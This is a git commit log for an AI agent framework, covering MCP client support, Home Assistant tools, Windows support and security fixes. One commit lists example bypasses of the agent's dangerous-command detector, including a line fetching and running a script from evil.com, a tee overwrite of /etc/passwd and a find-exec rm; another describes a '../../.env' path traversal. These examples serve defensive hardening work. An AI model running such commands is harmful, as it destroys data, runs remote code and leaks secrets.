fix: use os.sep in skill_view path boundary check for Windows compatibility 2026-03-04 06:50:06 +03:00
teknium1
ffec21236d feat: enhance Home Assistant integration with service discovery and setup
Improvements to the HA integration merged from PR #184:

- Add ha_list_services tool: discovers available services (actions) per
  domain with descriptions and parameter fields. Tells the model what
  it can do with each device type (e.g. light.turn_on accepts brightness,
  color_name, transition). Closes the gap where the model had to guess
  available actions.

- Add HA to hermes tools config: users can enable/disable the homeassistant
  toolset and configure HASS_TOKEN + HASS_URL through 'hermes tools' setup
  flow instead of manually editing .env.

- Fix should-fix items from code review:
  - Remove sys.path.insert hack from gateway adapter
  - Replace all print() calls with proper logger (info/warning/error)
  - Move env var reads from import-time to handler-time via _get_config()
  - Add dedicated REST session reuse in gateway send()

- Update ha_call_service description to reference ha_list_services for
  action discovery.

- Update tests for new ha_list_services tool in toolset resolution.
2026-03-03 05:16:53 -08:00
areu01or00
a1c25046a9 fix(timezone): add timezone-aware clock across agent, cron, and execute_code 2026-03-03 18:23:40 +05:30
0xbyt4
aefc330b8f merge: resolve conflict with main (add mcp + homeassistant extras) 2026-03-03 14:52:22 +03:00
0xbyt4
f967471758 merge: resolve conflict with main (keep fence markers + _find_shell) 2026-03-03 14:50:45 +03:00
teknium1
de59d91add feat: Windows native support via Git Bash
- Add scripts/install.cmd batch wrapper for CMD users (delegates to install.ps1)
- Add _find_shell() in local.py: detects Git Bash on Windows via
  HERMES_GIT_BASH_PATH env var, shutil.which, or common install paths
  (same pattern as Claude Code's CLAUDE_CODE_GIT_BASH_PATH)
- Use _find_shell() in process_registry.py for background processes
- Fix hermes_cli/gateway.py: use wmic instead of ps aux on Windows,
  skip SIGKILL (doesn't exist on Windows), fix venv path
  (Scripts/python.exe vs bin/python)
- Update README with three install commands (Linux/macOS, PowerShell, CMD)
  and Windows native documentation

Requires Git for Windows, which bundles bash.exe. The terminal tool
transparently uses Git Bash for shell commands regardless of whether
the user launched hermes from PowerShell or CMD.
2026-03-02 22:03:29 -08:00
teknium1
7df14227a9 feat(mcp): banner integration, /reload-mcp command, resources & prompts
Banner integration:
- MCP Servers section in CLI startup banner between Tools and Skills
- Shows each server with transport type, tool count, connection status
- Failed servers shown in red; section hidden when no MCP configured
- Summary line includes MCP server count
- Removed raw print() calls from discovery (banner handles display)

/reload-mcp command:
- New slash command in both CLI and gateway
- Disconnects all MCP servers, re-reads config.yaml, reconnects
- Reports what changed (added/removed/reconnected servers)
- Allows adding/removing MCP servers without restarting

Resources & Prompts support:
- 4 utility tools registered per server: list_resources, read_resource,
  list_prompts, get_prompt
- Exposes MCP Resources (data sources) and Prompts (templates) as tools
- Proper parameter schemas (uri for read_resource, name for get_prompt)
- Handles text and binary resource content
- 23 new tests covering schemas, handlers, and registration

Test coverage: 74 MCP tests total, 1186 tests pass overall.
2026-03-02 19:15:59 -08:00
teknium1
60effcfc44 fix(mcp): parallel discovery, user-visible logging, config validation
- Discovery is now parallel (asyncio.gather) instead of sequential,
  fixing the 60s shared timeout issue with multiple servers
- Startup messages use print() so users see connection status even
  with default log levels (the 'tools' logger is set to ERROR)
- Summary line shows total tools and failed servers count
- Validate conflicting config: warn if both 'url' and 'command' are
  present (HTTP takes precedence)
- Update TODO.md: mark MCP as implemented, list remaining work
- Add test for conflicting config detection (51 tests total)

All 1163 tests pass.
2026-03-02 19:02:28 -08:00
teknium1
64ff8f065b feat(mcp): add HTTP transport, reconnection, security hardening
Upgrades the MCP client implementation from PR #291 with:

- HTTP/Streamable HTTP transport: support 'url' key in config for remote
  MCP servers (Notion, Slack, Sentry, Supabase, etc.)
- Automatic reconnection with exponential backoff (1s-60s, 5 retries)
  when a server connection drops unexpectedly
- Environment variable filtering: only pass safe vars (PATH, HOME, etc.)
  plus user-specified env to stdio subprocesses (prevents secret leaks)
- Credential stripping: sanitize error messages before returning to the
  LLM (strips GitHub PATs, OpenAI keys, Bearer tokens, etc.)
- Configurable per-server timeouts: 'timeout' and 'connect_timeout' keys
- Fix shutdown race condition in servers_snapshot variable scoping

Test coverage: 50 tests (up from 30), including new tests for env
filtering, credential sanitization, HTTP config detection, reconnection
logic, and configurable timeouts.

All 1162 tests pass (1162 passed, 3 skipped, 0 failed).
2026-03-02 18:40:03 -08:00
teknium1
468b7fdbad Merge PR #291: feat: add MCP (Model Context Protocol) client support
Authored by 0xbyt4. Adds MCP client with official SDK, direct tool registration,
auto-injection into hermes-* toolsets, and graceful degradation.
2026-03-02 18:24:31 -08:00
teknium1
dd9d3f89b9 Merge PR #286: Fix ClawHub Skills Hub adapter for API endpoint changes
Authored by BP602. Fixes #285.
2026-03-02 17:25:14 -08:00
teknium1
2ba87a10b0 Merge PR #219: fix: guard POSIX-only process functions for Windows compatibility
Authored by Farukest. Fixes #218.
2026-03-02 17:07:49 -08:00
aydnOktay
5fa3e24b76 Make process_registry checkpoint writes atomic 2026-03-03 02:44:01 +03:00
0xbyt4
11615014a4 fix: eliminate shell noise from terminal output with fence markers
- Wrap commands with unique fence markers (printf FENCE; cmd; printf FENCE)
  to isolate real output from shell init/exit noise (oh-my-zsh, macOS
  session restore/save, docker plugin errors, etc.)
- Expand _clean_shell_noise to cover zsh/macOS patterns and strip from
  both beginning and end (fallback when fences are missing)
- Fix BSD find compatibility: fallback to simple find when -printf
  produces empty output (macOS)
- Fix test_terminal_disk_usage: use sys.modules to get the real module
  instead of the shadowed function from tools/__init__.py
- Add 13 new unit tests for fence extraction and zsh noise patterns
2026-03-02 22:53:21 +03:00
0xbyt4
11a2ecb936 fix: resolve thread safety issues and shutdown deadlock in MCP client
- Add threading.Lock protecting all shared state (_servers, _mcp_loop, _mcp_thread)
- Fix deadlock in shutdown_mcp_servers: _stop_mcp_loop was called inside
  a _lock block but also acquires _lock (non-reentrant)
- Fix race condition in _ensure_mcp_loop with concurrent callers
- Change idempotency to per-server (retry failed servers, skip connected)
- Dynamic toolset injection via startswith("hermes-") instead of hardcoded list
- Parallel shutdown via asyncio.gather instead of sequential loop
- Add tests for partial failure retry, parallel shutdown, dynamic injection
2026-03-02 22:08:32 +03:00
0xbyt4
593c549bc4 fix: make discover_mcp_tools idempotent to prevent duplicate connections
When discover_mcp_tools() is called multiple times (e.g. direct call
then model_tools import), return existing tool names instead of opening
new connections that would orphan the previous ones.
2026-03-02 21:34:21 +03:00
0xbyt4
aa2ecaef29 fix: resolve orphan subprocess leak on MCP server shutdown
Refactor MCP connections from AsyncExitStack to task-per-server
architecture. Each server now runs as a long-lived asyncio Task
with `async with stdio_client(...)`, ensuring anyio cancel-scope
cleanup happens in the same Task that opened the connection.
2026-03-02 21:22:00 +03:00
0xbyt4
3c252ae44b feat: add MCP (Model Context Protocol) client support
Connect to external MCP servers via stdio transport, discover their tools
at startup, and register them into the hermes-agent tool registry.

- New tools/mcp_tool.py: config loading, server connection via background
  event loop, tool handler factories, discovery, and graceful shutdown
- model_tools.py: trigger MCP discovery after built-in tool imports
- cli.py: call shutdown_mcp_servers in _run_cleanup
- pyproject.toml: add mcp>=1.2.0 as optional dependency
- 27 unit tests covering config, schema conversion, handlers, registration,
  SDK interaction, toolset injection, graceful fallback, and shutdown

Config format (in ~/.hermes/config.yaml):
  mcp_servers:
    filesystem:
      command: "npx"
      args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
2026-03-02 21:03:14 +03:00
BP602
6789084ec0
Fix ClawHub Skills Hub adapter for updated API 2026-03-02 16:11:49 +01:00
teknium1
4faf2a6cf4 Merge PR #233: fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection
Authored by Farukest. Fixes #232.
2026-03-02 04:44:06 -08:00
teknium1
8c48bb080f refactor: remove unnecessary single-element loop in disk usage calc
The 'for pattern in [f"hermes-*{task_id[:8]}*"]' was a loop over a
single-element list — just use a plain variable instead.
2026-03-02 04:40:13 -08:00
teknium1
6d2481ee5c Merge PR #231: fix: use task-specific glob pattern in disk usage calculation
Authored by Farukest. Fixes #230.
2026-03-02 04:38:58 -08:00
Dogila Developer
fd335a4e26
fix: add missing dangerous command patterns in approval.py
Three attack vectors bypassed the dangerous command detection system:

1. tee writes to sensitive paths (/etc/, /dev/sd, .ssh/, .hermes/.env)
were not detected. tee writes to files just like > but was absent
from DANGEROUS_PATTERNS.
Example: echo 'evil' | tee /etc/passwd

2. curl/wget via process substitution bypassed the pipe-to-shell check.
The existing pattern only matched curl ... | bash but not
bash <(curl ...) which is equally dangerous.
Example: bash <(curl http://evil.com/install.sh)

3. find -exec with full-path rm (e.g. /bin/rm, /usr/bin/rm) was not
caught. The pattern only matched bare rm, not absolute paths.
Example: find . -exec /bin/rm {} \;
2026-03-02 14:46:20 +03:00
teknium1
39bfd226b8 Merge PR #225: fix: preserve empty content in ReadResult.to_dict()
Authored by Farukest. Fixes #224.
2026-03-02 03:13:31 -08:00
teknium1
1cb2311bad fix(security): block path traversal in skill_view file_path (fixes #220)
skill_view accepted arbitrary file_path values like '../../.env' and
would read files outside the skill directory, exposing API keys and
other sensitive data.

Added two layers of defense:
1. Reject paths with '..' components (fast, catches obvious traversal)
2. resolve() containment check with trailing '/' to prevent prefix
   collisions (catches symlinks and edge cases)

Fix approach from PR #242 (@Bartok9). Vulnerability reported by
@Farukest (#220, PR #221). Tests rewritten to properly mock SKILLS_DIR.

Closes #220
2026-03-02 02:00:09 -08:00
BathreeNode
bd8b20b933
Merge branch 'NousResearch:main' into main 2026-03-02 12:14:34 +03:00